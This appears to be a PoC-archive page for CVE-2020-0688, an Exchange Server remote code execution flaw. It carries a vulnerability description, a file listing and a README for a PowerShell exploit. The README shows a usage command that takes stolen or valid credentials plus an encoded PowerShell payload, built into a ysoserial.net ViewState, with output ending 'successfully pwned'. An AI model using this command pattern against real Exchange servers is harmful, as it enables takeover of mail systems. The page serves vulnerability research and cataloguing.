Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-0688 PoC — Microsoft Exchange Server 授权问题漏洞

Source
https://github.com/justin-p/PSForgot2kEyXCHANGE
Associated Vulnerability
Title:Microsoft Exchange Server 授权问题漏洞 (CVE-2020-0688)
Description:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 中存在授权问题漏洞,该漏洞源于程序无法正确处理内存中的对象。攻击者可借助特制的电子邮件利用该漏洞在系统用户的上下文中运行任意代码。以下产品及版本受到影响:Microsoft Exchange Server 2010,Microsoft Exchange Server 2013,Micro
Description
PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell
Readme
# PSForgot2kEyXCHANGE

PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell

## Usage

This PoC requires a valid Username and Password.

This PoC uses [ysoserial.net](https://github.com/pwntester/ysoserial.net) to create the new ViewState which contains the command you specified on the -Command param.
If you don't already have this installed on your system download it [here](https://github.com/pwntester/ysoserial.net).

```PowerShell
PS> . .\PSForgot2kEyXCHANGE.ps1
PS> Invoke-Forgot2kEyXCHANG -Server 'https://webmail.domain.tld' -User 'Steve.McGreeve@domain.tld' -Password 'Summer2020!' -Command 'cmd /c powershell.exe -en dwByAGkAdABlAC0AaABvAHMAdAAgACcASQAnAG0AIABhACAAcwB0AGkAbgBrAHkAIABzAGsAaQBkACAAdwBoAG8AIAByAHUAbgBzACAAcgBhAG4AZABvAG0AIABjAG8AZABlACAAOgApACcA=' -YsoserialPath 'C:\tools\ysoserial.net\ysoserial.exe'
[+] Login successfully!
[+] Generated new ViewState successfully!
[+] Got a 500 response, successfully pwned https://webmail.domain.tld !
```

# Contributing

Feel free to open issues, contribute and submit your Pull Requests. You can also ping me on Twitter (@JustinPerdok)
File Snapshot

 [4.0K]  /data/pocs/8e34b0f61289e60d9c12000edebf09fd5c5d3bf1
├── [1.0K]  LICENSE.md
├── [6.9K]  PSForgot2kEyXCHANGE.ps1
└── [1.1K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.